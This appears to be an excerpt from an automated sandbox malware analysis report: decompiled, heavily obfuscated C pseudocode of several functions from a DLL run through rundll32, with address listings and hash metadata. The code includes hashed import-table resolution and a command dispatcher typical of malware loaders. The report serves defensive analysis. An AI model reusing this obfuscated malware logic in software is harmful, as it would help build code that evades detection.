				_v60 = _v60 + 0xffff84e2;
				_v60 = _v60 ^ 0x0000629b;
				_v80 = 0x779;
				_v80 = _v80 << 0xa;
				_v80 = _v80 << 2;
				_v80 = _v80 | 0x746c3a89;
				_v80 = _v80 ^ 0x747fb8a8;
				_v84 = 0x97f4;
				_v84 = _v84 ^ 0xacb5c4e6;
				_v84 = _v84 * 0x15;
				_v84 = _v84 | 0x645395ef;
				_v84 = _v84 ^ 0x6edfb60f;
				do {
					while(_t145 != 0x10d238e9) {
						if(_t145 == 0x13bcd39c) {
							_t139 = E1001D290(_v64, _v92, _v76, _t165, _v96,  &_v52);
							_t174 =  &(_t174[4]);
							__eflags = _t139;
							if(__eflags != 0) {
								_t145 = 0x30fa29dc;
								continue;
							}
						} else {
							if(_t145 == 0x30fa29dc) {
								__eflags = E10009899(_t165 + 4, _v56, __eflags,  &_v52, _v60, _v80, _v84);
								_t166 =  !=  ? 1 : _t166;
							} else {
								if(_t145 != 0x388706b5) {
									goto L9;
								} else {
									_t145 = 0x10d238e9;
									continue;
								}
							}
						}
						L12:
						return _t166;
					}
					E1001F3E9(_v88, _v68, _v72, _t143,  &_v52);
					_t174 =  &(_t174[3]);
					_t145 = 0x13bcd39c;
					L9:
					__eflags = _t145 - 0x2a61d71f;
				} while (__eflags != 0);
				goto L12;
			}


























                                                                        0x1001caa7
                                                                        0x1001caae
                                                                        0x1001cab2
                                                                        0x1001cab4
                                                                        0x1001cabb
                                                                        0x1001cac2
                                                                        0x1001cac3
                                                                        0x1001cac4
                                                                        0x1001cac5
                                                                        0x1001caca
                                                                        0x1001cad2
                                                                        0x1001cadb
                                                                        0x1001cadd
                                                                        0x1001cae4
                                                                        0x1001cae9
                                                                        0x1001caef
                                                                        0x1001caf4
                                                                        0x1001cafc
                                                                        0x1001cb04
                                                                        0x1001cb10
                                                                        0x1001cb15
                                                                        0x1001cb1b
                                                                        0x1001cb23
                                                                        0x1001cb2b
                                                                        0x1001cb37
                                                                        0x1001cb3c
                                                                        0x1001cb46
                                                                        0x1001cb4b
                                                                        0x1001cb51
                                                                        0x1001cb59
                                                                        0x1001cb61
                                                                        0x1001cb69
                                                                        0x1001cb71
                                                                        0x1001cb79
                                                                        0x1001cb81
                                                                        0x1001cb89
                                                                        0x1001cb91
                                                                        0x1001cb99
                                                                        0x1001cba1
                                                                        0x1001cba9
                                                                        0x1001cbae
                                                                        0x1001cbb6
                                                                        0x1001cbc2
                                                                        0x1001cbc5
                                                                        0x1001cbce
                                                                        0x1001cbd7
                                                                        0x1001cbdb
                                                                        0x1001cbe3
                                                                        0x1001cbeb
                                                                        0x1001cbf3
                                                                        0x1001cbfb
                                                                        0x1001cc03
                                                                        0x1001cc0b
                                                                        0x1001cc13
                                                                        0x1001cc1b
                                                                        0x1001cc20
                                                                        0x1001cc2a
                                                                        0x1001cc32
                                                                        0x1001cc3a
                                                                        0x1001cc42
                                                                        0x1001cc4f
                                                                        0x1001cc53
                                                                        0x1001cc5b
                                                                        0x1001cc63
                                                                        0x1001cc63
                                                                        0x1001cc6d
                                                                        0x1001cc99
                                                                        0x1001cc9e
                                                                        0x1001cca1
                                                                        0x1001cca3
                                                                        0x1001cca5
                                                                        0x00000000
                                                                        0x1001cca5
                                                                        0x1001cc6f
                                                                        0x1001cc75
                                                                        0x1001ccf8
                                                                        0x1001ccfa
                                                                        0x1001cc77
                                                                        0x1001cc7d
                                                                        0x00000000
                                                                        0x1001cc7f
                                                                        0x1001cc7f
                                                                        0x00000000
                                                                        0x1001cc7f
                                                                        0x1001cc7d
                                                                        0x1001cc75
                                                                        0x1001ccfe
                                                                        0x1001cd06
                                                                        0x1001cd06
                                                                        0x1001ccbe
                                                                        0x1001ccc3
                                                                        0x1001ccc6
                                                                        0x1001cccb
                                                                        0x1001cccb
                                                                        0x1001cccb
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,)$/
                                                                        • API String ID: 0-233899039
                                                                        • Opcode ID: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
                                                                        • Instruction ID: 65b2c97f17a7b7744a18fbb07baf764625514e653d75bdddd1878b23c210d4d9
                                                                        • Opcode Fuzzy Hash: 4ad18bab273ac8b3cf774fb827cc12b4d9418481b084281fa1ae0e97bf415739
                                                                        • Instruction Fuzzy Hash: 82516571508345AFE354CF21C489A1BBBE1FBC8788F40891DF4A69A2A0D775DA49CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100056B3, Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E100056B3(void* __edx, char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ecx;
				void* _t84;
				void* _t91;
				signed short _t97;
				signed short _t98;
				signed short _t99;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				signed short _t113;
				signed short* _t116;
				signed short _t117;
				signed short _t119;
				signed int* _t121;

				_t99 = _a8;
				_push(_a12);
				_push(_t99);
				_push(_a4);
				_push(__edx);
				E100056B2(_t84);
				_a8 = 0xbb3c;
				_t121 =  &(( &_v24)[5]);
				_a8 = _a8 + 0xffff0478;
				_a8 = _a8 << 0xb;
				_a8 = _a8 + 0xfffffb27;
				_a8 = _a8 ^ 0xfdfd9b26;
				_v16 = 0x694e;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffffd888;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xf6f4b2b2;
				_v4 = 0xcfd5;
				_t101 = 0x77;
				_v4 = _v4 / _t101;
				_v4 = _v4 ^ 0x00007af6;
				_v20 = 0x3853;
				_v20 = _v20 + 0x2f57;
				_v20 = _v20 << 0xc;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x33d5042f;
				_v24 = 0x48cf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xa5d7;
				_v24 = _v24 ^ 0x227c1387;
				_v24 = _v24 ^ 0x227cf043;
				_v8 = 0x820c;
				_v8 = _v8 * 0x4e;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x047d7705;
				_v12 = 0x55c9;
				_v12 = _v12 + 0xffff6fb2;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xff8ad068;
				_t102 = _a8;
				_t91 =  *((intOrPtr*)(_t99 + 0x3c)) + _t99;
				_t111 =  *((intOrPtr*)(_t91 + 0x78 + _t102 * 8));
				if(_t111 == 0 ||  *((intOrPtr*)(_t91 + 0x7c + _t102 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t117 = _t111 + _t99;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0xc));
						if( *((intOrPtr*)(_t117 + 0xc)) == 0) {
							goto L13;
						}
						_t113 = E10018DF5(_t94 + _t99, _v16, _v4, _v20, _v24);
						_t121 =  &(_t121[3]);
						_a8 = _t113;
						__eflags = _t113;
						if(_t113 == 0) {
							L15:
							return 0;
						}
						_t116 =  *_t117 + _t99;
						_t119 =  *((intOrPtr*)(_t117 + 0x10)) + _t99;
						while(1) {
							_t97 =  *_t116;
							__eflags = _t97;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t105 = _t99 + 2 + _t97;
								__eflags = _t99 + 2 + _t97;
							} else {
								_t105 = _t97 & 0x0000ffff;
							}
							_t98 = E1000CDD0(_t105, _v8, _v12, _t113);
							__eflags = _t98;
							if(_t98 == 0) {
								goto L15;
							} else {
								_t113 = _a8;
								_t116 =  &(_t116[2]);
								 *_t119 = _t98;
								_t119 =  &_a4;
								__eflags = _t119;
								continue;
							}
						}
						_t117 = _t117 + 0x14;
						__eflags = _t117;
					}
					goto L13;
				}
			}























                                                                        0x100056b7
                                                                        0x100056be
                                                                        0x100056c2
                                                                        0x100056c3
                                                                        0x100056c7
                                                                        0x100056c9
                                                                        0x100056ce
                                                                        0x100056d6
                                                                        0x100056d9
                                                                        0x100056e3
                                                                        0x100056e8
                                                                        0x100056f0
                                                                        0x100056f8
                                                                        0x10005700
                                                                        0x10005705
                                                                        0x1000570d
                                                                        0x10005712
                                                                        0x1000571a
                                                                        0x10005728
                                                                        0x1000572b
                                                                        0x1000572f
                                                                        0x10005737
                                                                        0x1000573f
                                                                        0x10005747
                                                                        0x1000574c
                                                                        0x10005751
                                                                        0x10005759
                                                                        0x10005761
                                                                        0x10005766
                                                                        0x1000576e
                                                                        0x10005776
                                                                        0x1000577e
                                                                        0x1000578b
                                                                        0x10005794
                                                                        0x10005798
                                                                        0x100057a0
                                                                        0x100057a8
                                                                        0x100057b0
                                                                        0x100057b5
                                                                        0x100057c0
                                                                        0x100057c4
                                                                        0x100057c6
                                                                        0x100057cc
                                                                        0x10005847
                                                                        0x00000000
                                                                        0x100057d5
                                                                        0x100057d5
                                                                        0x10005840
                                                                        0x10005840
                                                                        0x10005845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100057f2
                                                                        0x100057f4
                                                                        0x100057f7
                                                                        0x100057fb
                                                                        0x100057fd
                                                                        0x10005852
                                                                        0x00000000
                                                                        0x10005852
                                                                        0x10005804
                                                                        0x10005806
                                                                        0x10005837
                                                                        0x10005837
                                                                        0x10005839
                                                                        0x1000583b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000580a
                                                                        0x10005814
                                                                        0x10005814
                                                                        0x1000580c
                                                                        0x1000580c
                                                                        0x1000580c
                                                                        0x1000581f
                                                                        0x10005826
                                                                        0x10005828
                                                                        0x00000000
                                                                        0x1000582a
                                                                        0x1000582a
                                                                        0x1000582e
                                                                        0x10005831
                                                                        0x10005834
                                                                        0x10005834
                                                                        0x00000000
                                                                        0x10005834
                                                                        0x10005828
                                                                        0x1000583d
                                                                        0x1000583d
                                                                        0x1000583d
                                                                        0x00000000
                                                                        0x10005840

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Ni$W/
                                                                        • API String ID: 0-111194442
                                                                        • Opcode ID: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
                                                                        • Instruction ID: 9a1005561c3df8b761318bfd7a223ab57cf0a9f60e4c9267babe61ed4d5f545d
                                                                        • Opcode Fuzzy Hash: ce07b1ab16d3e2f26c795e08b7096ef518bbb2213e0d655af138487974276c43
                                                                        • Instruction Fuzzy Hash: 544168B15083428FE354CF24C88480BBBF1FBC4798F518A2CF99596255EB76DA09CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001DD78, Relevance: 2.6, Strings: 2, Instructions: 80COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001DD78(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t69;
				void* _t73;
				void* _t76;
				intOrPtr _t79;
				signed int* _t81;

				_t73 = __ecx;
				_t81 =  &_v40;
				_v8 = 0x1b7700;
				_t79 = 0;
				_v4 = 0;
				_t76 = 0xdac552c;
				_v16 = 0x3c26;
				_v16 = _v16 | 0x2b145b71;
				_v16 = _v16 ^ 0x2b14102b;
				_v40 = 0xd45e;
				_v40 = _v40 ^ 0x28d15431;
				_v40 = _v40 * 0xf;
				_v40 = _v40 | 0xf1f7d666;
				_v40 = _v40 ^ 0xf5f7dcd7;
				_v20 = 0xc134;
				_v20 = _v20 ^ 0xfce9bf97;
				_v20 = _v20 ^ 0xfce94421;
				_v24 = 0x60c0;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00000a32;
				_v12 = 0x6ec6;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x000ddcb5;
				_v28 = 0xb783;
				_v28 = _v28 + 0x4382;
				_v28 = _v28 + 0xd9fc;
				_v28 = _v28 ^ 0x0001ab03;
				_v36 = 0xe117;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 | 0x4f01522f;
				_v36 = _v36 + 0xffffd003;
				_v36 = _v36 ^ 0x4f014085;
				_v32 = 0xf8b3;
				_v32 = _v32 * 0x65;
				_v32 = _v32 + 0xc87a;
				_v32 = _v32 ^ 0x0062f8e1;
				do {
					while(_t76 != 0x15fecb3) {
						if(_t76 == 0xdac552c) {
							_t76 = 0x15fecb3;
							continue;
						} else {
							if(_t76 != 0x172cce4b) {
								goto L8;
							} else {
								_t79 = _t79 + E10007544(_v12, _v28, _v36, _t73 + 4, _v32);
							}
						}
						L5:
						return _t79;
					}
					_t69 = E10007E30();
					_t81 = _t81 - 0xc + 0xc;
					_t76 = 0x172cce4b;
					_t79 = _t79 + _t69;
					L8:
				} while (_t76 != 0x1c39a7d);
				goto L5;
			}


















                                                                        0x1001dd78
                                                                        0x1001dd78
                                                                        0x1001dd7b
                                                                        0x1001dd86
                                                                        0x1001dd8d
                                                                        0x1001dd91
                                                                        0x1001dd93
                                                                        0x1001dda0
                                                                        0x1001dda8
                                                                        0x1001ddb0
                                                                        0x1001ddb8
                                                                        0x1001ddcb
                                                                        0x1001ddcf
                                                                        0x1001ddd7
                                                                        0x1001dddf
                                                                        0x1001dde7
                                                                        0x1001ddef
                                                                        0x1001ddf7
                                                                        0x1001ddff
                                                                        0x1001de04
                                                                        0x1001de0c
                                                                        0x1001de14
                                                                        0x1001de19
                                                                        0x1001de21
                                                                        0x1001de29
                                                                        0x1001de31
                                                                        0x1001de39
                                                                        0x1001de41
                                                                        0x1001de49
                                                                        0x1001de4e
                                                                        0x1001de56
                                                                        0x1001de5e
                                                                        0x1001de66
                                                                        0x1001de73
                                                                        0x1001de77
                                                                        0x1001de7f
                                                                        0x1001de87
                                                                        0x1001de87
                                                                        0x1001de8d
                                                                        0x1001debb
                                                                        0x00000000
                                                                        0x1001de8f
                                                                        0x1001de91
                                                                        0x00000000
                                                                        0x1001de93
                                                                        0x1001deaf
                                                                        0x1001deaf
                                                                        0x1001de91
                                                                        0x1001deb2
                                                                        0x1001deba
                                                                        0x1001deba
                                                                        0x1001ded2
                                                                        0x1001ded7
                                                                        0x1001deda
                                                                        0x1001dedc
                                                                        0x1001dede
                                                                        0x1001dede
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &<$2
                                                                        • API String ID: 0-12532211
                                                                        • Opcode ID: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
                                                                        • Instruction ID: 2d2181df3d2bb9c93a47c4eee62150f0e4f5b302c766535f93e70661617adfa9
                                                                        • Opcode Fuzzy Hash: 840e47962e3d73477b89a5bfd9ac43b6a925a88084486f6c4384313c70dfcef2
                                                                        • Instruction Fuzzy Hash: D73167719083418FD304EF25DA4A40FBBE1FBD4758F104A2EF485A6220D3B9DA498F87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013D7C, Relevance: 1.4, Strings: 1, Instructions: 171COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E10013D7C(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* __ecx;
				void* _t185;
				signed int _t212;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				void* _t250;

				_push(_a12);
				_t250 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t185);
				_v84 = _v84 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v92 = 0x2af249;
				_v88 = 0xa239d;
				_v72 = 0x3311;
				_v72 = _v72 | 0x7bf224ce;
				_v72 = _v72 ^ 0x7bf237de;
				_v36 = 0xf7a4;
				_v36 = _v36 + 0xffffc682;
				_v36 = _v36 + 0xffffc2a9;
				_v36 = _v36 ^ 0x000086db;
				_v68 = 0xdbd1;
				_v68 = _v68 + 0xcfce;
				_v68 = _v68 ^ 0x0001a39f;
				_v12 = 0x5909;
				_v12 = _v12 + 0x65b0;
				_v12 = _v12 >> 1;
				_v12 = _v12 + 0xffff8c6d;
				_v12 = _v12 ^ 0xfffff7ad;
				_v44 = 0x56e3;
				_v44 = _v44 + 0x126;
				_t216 = 9;
				_v44 = _v44 / _t216;
				_v44 = _v44 ^ 0x00003ea1;
				_v8 = 0x9ec;
				_t217 = 0xc;
				_v8 = _v8 / _t217;
				_t218 = 0xf;
				_v8 = _v8 / _t218;
				_v8 = _v8 ^ 0x5389c1c6;
				_v8 = _v8 ^ 0x53898368;
				_v56 = 0x8b50;
				_t219 = 0x7c;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x0042a85f;
				_v64 = 0xa08d;
				_v64 = _v64 + 0xcc80;
				_v64 = _v64 ^ 0x00016541;
				_v40 = 0x6173;
				_v40 = _v40 | 0xc384fcd4;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0x7efba2ce;
				_v24 = 0xc6dd;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffff231a;
				_v24 = _v24 ^ 0x00179bda;
				_v48 = 0xc35f;
				_v48 = _v48 << 0xc;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x00004803;
				_v32 = 0xc90e;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x0001a766;
				_v76 = 0x4072;
				_v76 = _v76 / _t219;
				_v76 = _v76 ^ 0x00003c70;
				_v28 = 0x9423;
				_v28 = _v28 + 0xffff4e74;
				_t220 = 0x19;
				_v28 = _v28 * 0x2e;
				_v28 = _v28 ^ 0xfffa9c10;
				_v16 = 0x38cb;
				_v16 = _v16 ^ 0x15f5157f;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xf435;
				_v16 = _v16 ^ 0x7d4c407a;
				_v52 = 0x39bb;
				_v52 = _v52 + 0xffffae06;
				_v52 = _v52 ^ 0xce0d0fc0;
				_v52 = _v52 ^ 0x31f2a856;
				_v60 = 0xc52f;
				_t221 = 0x65;
				_v60 = _v60 / _t220;
				_v60 = _v60 ^ 0x00004cfc;
				_v20 = 0xe49b;
				_v20 = _v20 + 0xf3d2;
				_v20 = _v20 / _t221;
				_v20 = _v20 ^ 0x00007d6c;
				E10001CB3( &_v124, _v12, 0x1e, _v44);
				E10001CB3( &_v644, _v8, 0x208, _v56);
				E10001CB3( &_v1164, _v64, 0x208, _v40);
				E10015891(_a12,  &_v644, _v24, _v48, _v32);
				E10015891(_t250,  &_v1164, _v76, _v28, _v16);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v68 | _v36;
				_t212 = E1001C9E4(_v60, _v20,  &_v124);
				asm("sbb eax, eax");
				return  ~_t212 + 1;
			}










































                                                                        0x10013d87
                                                                        0x10013d8a
                                                                        0x10013d8c
                                                                        0x10013d8f
                                                                        0x10013d92
                                                                        0x10013d94
                                                                        0x10013d99
                                                                        0x10013d9f
                                                                        0x10013da3
                                                                        0x10013daa
                                                                        0x10013db1
                                                                        0x10013db8
                                                                        0x10013dbf
                                                                        0x10013dc6
                                                                        0x10013dcd
                                                                        0x10013dd4
                                                                        0x10013ddb
                                                                        0x10013de2
                                                                        0x10013de9
                                                                        0x10013df0
                                                                        0x10013df7
                                                                        0x10013dfe
                                                                        0x10013e05
                                                                        0x10013e08
                                                                        0x10013e0f
                                                                        0x10013e16
                                                                        0x10013e1d
                                                                        0x10013e29
                                                                        0x10013e2e
                                                                        0x10013e33
                                                                        0x10013e3a
                                                                        0x10013e44
                                                                        0x10013e49
                                                                        0x10013e51
                                                                        0x10013e56
                                                                        0x10013e5b
                                                                        0x10013e62
                                                                        0x10013e69
                                                                        0x10013e74
                                                                        0x10013e75
                                                                        0x10013e78
                                                                        0x10013e7f
                                                                        0x10013e86
                                                                        0x10013e8d
                                                                        0x10013e94
                                                                        0x10013e9b
                                                                        0x10013ea2
                                                                        0x10013ea6
                                                                        0x10013ead
                                                                        0x10013eb4
                                                                        0x10013eb8
                                                                        0x10013ebf
                                                                        0x10013ec6
                                                                        0x10013ecd
                                                                        0x10013ed1
                                                                        0x10013ed5
                                                                        0x10013edc
                                                                        0x10013ee3
                                                                        0x10013ee7
                                                                        0x10013eeb
                                                                        0x10013ef2
                                                                        0x10013efe
                                                                        0x10013f03
                                                                        0x10013f0a
                                                                        0x10013f11
                                                                        0x10013f1e
                                                                        0x10013f21
                                                                        0x10013f24
                                                                        0x10013f2b
                                                                        0x10013f32
                                                                        0x10013f39
                                                                        0x10013f3d
                                                                        0x10013f44
                                                                        0x10013f4b
                                                                        0x10013f52
                                                                        0x10013f59
                                                                        0x10013f60
                                                                        0x10013f67
                                                                        0x10013f73
                                                                        0x10013f74
                                                                        0x10013f79
                                                                        0x10013f80
                                                                        0x10013f87
                                                                        0x10013f96
                                                                        0x10013f99
                                                                        0x10013fa8
                                                                        0x10013fbf
                                                                        0x10013fd1
                                                                        0x10013fe8
                                                                        0x10013ffe
                                                                        0x10014009
                                                                        0x10014012
                                                                        0x1001401b
                                                                        0x10014024
                                                                        0x10014035
                                                                        0x1001403e
                                                                        0x10014046

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: z@L}
                                                                        • API String ID: 0-656678828
                                                                        • Opcode ID: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
                                                                        • Instruction ID: 64054118f8c6f46c4d0f59fa63d6518252241b9f119ebe30aefd6ecd3cb38e95
                                                                        • Opcode Fuzzy Hash: 60fa0d3e1590c9607e5d51dbb1653ade0f49e62c408987f7d99e6032664efbe8
                                                                        • Instruction Fuzzy Hash: 18812072D0020DEBEF14CFA1D98A9DEBBB2FB44314F208159E415B6290D7B91A4ACF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018831, Relevance: 1.4, Strings: 1, Instructions: 136COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10018831(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				char _v120;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t125;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t161;
				void* _t163;
				void* _t165;
				void* _t166;

				_t166 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t100);
				_v40 = 0xa9e3;
				_v40 = _v40 | 0x2174341f;
				_v40 = _v40 ^ 0x2174d138;
				_t161 = 0;
				_v28 = 0xd1b7;
				_v28 = _v28 >> 6;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x0000747d;
				_v24 = 0x8bdd;
				_t131 = 0x3c;
				_v24 = _v24 / _t131;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x00001716;
				_v20 = 0xbd7b;
				_t132 = 0x56;
				_v20 = _v20 * 0x24;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00355362;
				_v12 = 0x1776;
				_t133 = 0x74;
				_v12 = _v12 / _t132;
				_v12 = _v12 + 0xffffd771;
				_v12 = _v12 * 0x66;
				_v12 = _v12 ^ 0xffefd8ce;
				_v36 = 0xe780;
				_v36 = _v36 + 0xffff8307;
				_v36 = _v36 ^ 0x00001dc1;
				_v32 = 0x334f;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x0066d4a3;
				_v44 = 0xfc2;
				_v44 = _v44 + 0xffff2eb0;
				_v44 = _v44 ^ 0xffff18b3;
				_v16 = 0xf408;
				_v16 = _v16 + 0xffff10d6;
				_v16 = _v16 << 0xf;
				_v16 = _v16 / _t133;
				_v16 = _v16 ^ 0x000527d6;
				E1001F3E9(_v40, _v28, _v24, __edx,  &_v120);
				_t165 = _t163 + 0x18;
				L15:
				_t113 = E10009899( &_v52, _v20, _t166,  &_v120, _v12, _v36, _v32);
				_t165 = _t165 + 0x10;
				if(_t113 != 0) {
					__eflags = E1001C04C( &_v68, _v44,  &_v52, _v16);
					if(__eflags != 0) {
						_t117 = _v64 - 1;
						__eflags = _t117;
						if(_t117 == 0) {
							E100177C0(_v68,  &_v60);
						} else {
							_t119 = _t117 - 1;
							__eflags = _t119;
							if(_t119 == 0) {
								E10007E34(_v68,  &_v60);
							} else {
								_t121 = _t119 - 1;
								__eflags = _t121;
								if(_t121 == 0) {
									E10003D4E(_v68,  &_v60);
								} else {
									_t123 = _t121 - 1;
									__eflags = _t123;
									if(_t123 == 0) {
										E10012965(_v68,  &_v60);
									} else {
										_t125 = _t123 - 6;
										__eflags = _t125;
										if(_t125 == 0) {
											E10001658(_v68,  &_v60);
										} else {
											__eflags = _t125 == 1;
											if(_t125 == 1) {
												E10002DEE(_v68,  &_v60);
											}
										}
									}
								}
							}
						}
						_t161 = _t161 + 1;
						__eflags = _t161;
					}
					goto L15;
				}
				return _t161;
			}































                                                                        0x10018831
                                                                        0x10018839
                                                                        0x1001883e
                                                                        0x1001883f
                                                                        0x10018840
                                                                        0x10018845
                                                                        0x1001884f
                                                                        0x10018858
                                                                        0x1001885f
                                                                        0x10018861
                                                                        0x10018868
                                                                        0x1001886c
                                                                        0x10018870
                                                                        0x10018877
                                                                        0x10018883
                                                                        0x10018888
                                                                        0x1001888d
                                                                        0x10018891
                                                                        0x10018898
                                                                        0x100188a3
                                                                        0x100188a6
                                                                        0x100188a9
                                                                        0x100188ac
                                                                        0x100188b3
                                                                        0x100188bf
                                                                        0x100188c0
                                                                        0x100188c5
                                                                        0x100188d0
                                                                        0x100188d3
                                                                        0x100188da
                                                                        0x100188e1
                                                                        0x100188e8
                                                                        0x100188ef
                                                                        0x100188f6
                                                                        0x100188fa
                                                                        0x10018901
                                                                        0x10018908
                                                                        0x1001890f
                                                                        0x10018916
                                                                        0x1001891d
                                                                        0x10018924
                                                                        0x1001892d
                                                                        0x10018933
                                                                        0x10018945
                                                                        0x1001894a
                                                                        0x100189cb
                                                                        0x100189de
                                                                        0x100189e3
                                                                        0x100189e8
                                                                        0x10018963
                                                                        0x10018965
                                                                        0x1001896a
                                                                        0x1001896a
                                                                        0x1001896b
                                                                        0x100189c5
                                                                        0x1001896d
                                                                        0x1001896d
                                                                        0x1001896d
                                                                        0x1001896e
                                                                        0x100189b8
                                                                        0x10018970
                                                                        0x10018970
                                                                        0x10018970
                                                                        0x10018971
                                                                        0x100189ab
                                                                        0x10018973
                                                                        0x10018973
                                                                        0x10018973
                                                                        0x10018974
                                                                        0x1001899e
                                                                        0x10018976
                                                                        0x10018976
                                                                        0x10018976
                                                                        0x10018979
                                                                        0x10018991
                                                                        0x1001897b
                                                                        0x1001897b
                                                                        0x1001897c
                                                                        0x10018984
                                                                        0x10018984
                                                                        0x1001897c
                                                                        0x10018979
                                                                        0x10018974
                                                                        0x10018971
                                                                        0x1001896e
                                                                        0x100189ca
                                                                        0x100189ca
                                                                        0x100189ca
                                                                        0x00000000
                                                                        0x10018965
